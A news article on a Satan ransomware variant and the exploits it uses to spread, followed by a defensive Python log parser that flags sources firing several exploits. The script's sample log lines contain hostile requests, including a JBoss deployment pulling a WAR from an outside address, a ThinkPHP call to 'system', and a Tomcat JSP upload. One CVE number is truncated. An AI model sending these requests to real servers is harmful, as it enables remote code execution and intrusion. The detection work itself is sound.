Security researchers have discovered a new variant of Satan ransomware that drops cryptominer malware as an additional payload.
The new campaign was discovered by security researchers at FortiGuard Labs and targets both Windows and Linux hosts.
The ransomware was seen leveraging a large number of vulnerabilities to propagate itself across both private and public networks.
For both Windows and Linux, the initial spreader can now propagate through both private and public networks.
In earlier campaigns, the Linux component (conn32/64) only propagated through non-Class A private networks. It has now been updated to support both private and public network propagation.
On Windows, it still leverages the EternalBlue exploit leaked from the NSA.
Some of the vulnerabilities targeted by Satan ransomware are listed below:
- JBoss default configuration vulnerability (CVE-2010-0738)
- Tomcat arbitrary file upload vulnerability (CVE-2017-12615)
- WebLogic arbitrary file upload vulnerability (CVE-2018-2894)
- WebLogic WLS component vulnerability (CVE-2017-10271)
- Windows SMB remote code execution vulnerability (MS17-010)
- Spring Data Commons remote code execution vulnerability (CVE-2018-12
In the new campaign, the researchers spotted the addition of several web application remote code execution exploits for both Windows and Linux. The new variant additionally targets the following vulnerabilities:
- Spring Data REST Patch Request (CVE-2017-8046)
- ElasticSearch (CVE-2015-1427)
- ThinkPHP 5.X Remote Code Execution (no CVE)
As for the propagation method, the spreader performs "IP address traversal and attempts to scan and execute its entire list of exploits on every IP address encountered, along with its corresponding hardcoded port list".
The researchers also observed that the ransomware probes for applications such as Drupal, XML-RPC and Adobe products.
It notifies the command-and-control server when such an application is found. The likely reason is to gather statistics on application usage for use in future attacks.
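The run-everything behaviour described above leaves a recognisable trace in web server access logs: one client throwing several unrelated exploits at the same host in quick succession, often followed by fingerprinting probes. The following Python script is an added example, not code from the article or from the FortiGuard report; it parses constructed Apache/nginx combined-format log lines, tags requests that match request-line signatures for the exploits the article names, and flags any source address that fired more than one distinct exploit. The URI patterns are this example's own assumptions drawn from public exploit write-ups, the log lines are constructed sample data on RFC 5737 documentation addresses, and the `find_spreaders` / `classify` names are the example's own.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

# Request-line signatures for exploits the article names. The URI patterns are
# this example's assumption (drawn from public exploit write-ups), not from the
# FortiGuard report. Exploits whose payload travels only in the request body
# (Spring Data REST CVE-2017-8046, Spring Data Commons, ElasticSearch
# CVE-2015-1427) cannot be recognised from the request line alone and need
# body inspection at a proxy or WAF.
EXPLOIT_SIGNATURES = {
    "CVE-2010-0738 JBoss JMX console verb tampering":
        re.compile(r"^(?!(?:GET|POST) )[A-Z]+ /jmx-console/HtmlAdaptor"),
    "CVE-2017-12615 Tomcat JSP upload via PUT":
        re.compile(r"^PUT \S+\.jsp(?:/|%20) "),
    "CVE-2018-2894 WebLogic ws_utc file upload":
        re.compile(r"^POST /ws_utc/(?:begin|config)\.do"),
    "CVE-2017-10271 WebLogic wls-wsat XMLDecoder":
        re.compile(r"^POST /wls-wsat/"),
    "ThinkPHP 5.x invokefunction RCE":
        re.compile(r"invokefunction&function=call_user_func_array", re.I),
}

# Fingerprinting probes of the kind the article says precede the C2 report
# (paths are this example's assumption).
PROBE_SIGNATURES = {
    "XML-RPC probe": re.compile(r"^(?:GET|POST) /xmlrpc\.php"),
    "Drupal probe": re.compile(r"^GET /(?:core/)?CHANGELOG\.txt"),
}

# Constructed sample log (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    r'203.0.113.7 - - [10/Jun/2019:08:01:02 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://203.0.113.7/x.war HTTP/1.1" 200 0',
    r'203.0.113.7 - - [10/Jun/2019:08:01:03 +0000] "PUT /x.jsp/ HTTP/1.1" 201 0',
    r'203.0.113.7 - - [10/Jun/2019:08:01:04 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 0',
    r'203.0.113.7 - - [10/Jun/2019:08:01:05 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 404 0',
    r'203.0.113.7 - - [10/Jun/2019:08:01:06 +0000] "GET /xmlrpc.php HTTP/1.1" 200 0',
    r'198.51.100.20 - - [10/Jun/2019:08:02:00 +0000] "GET /index.html HTTP/1.1" 200 1234',
    r'198.51.100.21 - - [10/Jun/2019:08:03:00 +0000] "PUT /upload.jsp/ HTTP/1.1" 404 0',
]


def classify(line):
    """Return (kind, signature_name, ip) for one log line, or None if it does
    not parse. kind is "exploit", "probe" or "benign"."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req, ip = m.group("req"), m.group("ip")
    for name, pattern in EXPLOIT_SIGNATURES.items():
        if pattern.search(req):
            return ("exploit", name, ip)
    for name, pattern in PROBE_SIGNATURES.items():
        if pattern.search(req):
            return ("probe", name, ip)
    return ("benign", None, ip)


def find_spreaders(lines, min_distinct=2):
    """Return {ip: [exploit names]} for clients that fired at least
    min_distinct *different* exploits. A single stray PUT is ordinary
    background noise; one client walking through the whole list is the
    "execute its entire list of exploits" behaviour the article describes."""
    hits = defaultdict(set)
    for line in lines:
        result = classify(line)
        if result and result[0] == "exploit":
            hits[result[2]].add(result[1])
    return {ip: sorted(names) for ip, names in hits.items() if len(names) >= min_distinct}


if __name__ == "__main__":
    for ip, names in find_spreaders(SAMPLE_LOG).items():
        print(f"{ip} fired {len(names)} distinct exploits:")
        for name in names:
            print(f"  {name}")
```

Matching on distinct exploit families per source, rather than on any single signature, is what separates this spreader's scan-everything pattern from the steady trickle of one-off scanner hits every internet-facing host sees; the threshold and the signature list are meant to be tuned to the applications actually deployed behind the log.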
"Satan Ransomware is becoming more and more aggressive with its spreading. By expanding the number of vulnerable web services and applications it targets, it increases its chance of finding another victim and generating more profits. In addition, Satan Ransomware has also already adopted the Ransomware-as-a-Service scheme, opening it up to use by more threat actors, which means more attacks and more revenue," the FortiGuard Labs researchers said in their blog post.